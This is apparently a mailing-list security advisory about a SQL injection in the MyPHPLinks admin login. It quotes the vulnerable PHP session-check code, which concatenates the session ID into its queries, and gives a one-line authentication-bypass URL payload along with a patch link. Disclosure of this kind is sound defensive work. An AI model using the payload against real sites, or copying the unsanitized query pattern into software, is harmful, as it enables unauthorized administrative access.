Informations :
°°°°°°°°°°°°°°
Website : http://www.myphpsoft.net
Version : ? -> 2.1.9, 2.2.0CVS
Problem : SQL Injection -> Admin access

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
admin/auth/checksession.php
---------------------------------------------------------------
[...]
if($idsession!=''){
$dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser,
$MyPHPLinksPass);
if(!$dbs->connect())
  die($dbs->error);
if(!$dbs->query("select count(*) as nb from ".$MyPHPLinksTBAuth." where
session='".$idsession."' and timesession > now()"))
  die($dbs->error);
while($dbs->nextrecord()){
  $loginauth = $dbs->valeur("nb");
}
if ($loginauth==0){
  header("Location:$MyPHPLinksAuthPErrDef");exit;
}else{
  if(!$dbs->query("UPDATE ".$MyPHPLinksTBAuth." set
timesession=now()+".$MyPHPLinksTLSession." where session='".$idsession."'"))
   die($dbs->error);
}
}else{
header("Location:$MyPHPLinksAuthPErrDef");exit;
}
?>
---------------------------------------------------------------

Exploit :
°°°°°°°°°
http://[target]/admin/index.php?idsession='%20OR%20''='

Patch :
°°°°°°°
A patch can be downloaded on
http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=m .

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/MyPhpLinks.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-mn

_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]